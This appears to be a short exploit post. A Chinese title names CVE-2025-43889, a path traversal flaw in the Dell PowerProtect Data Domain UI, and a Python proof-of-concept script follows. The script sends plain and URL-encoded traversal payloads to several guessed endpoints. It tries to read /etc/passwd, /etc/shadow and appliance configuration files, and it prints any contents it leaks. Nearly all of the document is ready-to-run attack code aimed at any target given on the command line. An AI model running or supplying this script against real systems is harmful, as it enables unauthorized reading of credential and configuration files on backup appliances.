CVE-2025-43889 Dell PowerProtect Data Domain UI路径遍历漏洞

# CVE-2025-43889 - Dell PowerProtect Data Domain Path Traversal PoC # Path traversal vulnerability in the UI component # Attacker can read files outside the restricted directory import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-data-domain.example.com" PORT = 443 # Path traversal payloads to test payloads = [ "/../../../../etc/passwd", "/..%2f..%2f..%2f..%2fetc/passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "/../../../../etc/shadow", "/../../../../data/config/dd.conf", "/../../../opt/ddrm/etc/ddr.conf", "/..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", ] def exploit_path_traversal(target_url, payload): """ Attempt path traversal on Dell PowerProtect Data Domain UI """ headers = { "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)", "Accept": "*/*", "Connection": "close" } # Try various UI endpoints that may be vulnerable endpoints = [ f"{target_url}/ui{payload}", f"{target_url}/restui{payload}", f"{target_url}/ddrm{payload}", f"{target_url}/api/v1{payload}", ] for endpoint in endpoints: try: response = requests.get( endpoint, headers=headers, verify=False, timeout=10, allow_redirects=False ) # Check for successful path traversal if response.status_code == 200 and len(response.content) > 0: if b"root:" in response.content or b"[ddrm]" in response.content: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response:\n{response.text[:500]}") return True except requests.exceptions.RequestException: continue return False if __name__ == "__main__": print(f"[*] Testing CVE-2025-43889 against {TARGET}") for payload in payloads: print(f"[*] Trying payload: {payload}") if exploit_path_traversal(TARGET, payload): print("[+] Exploit successful!") break else: print("[-] Target does not appear vulnerable")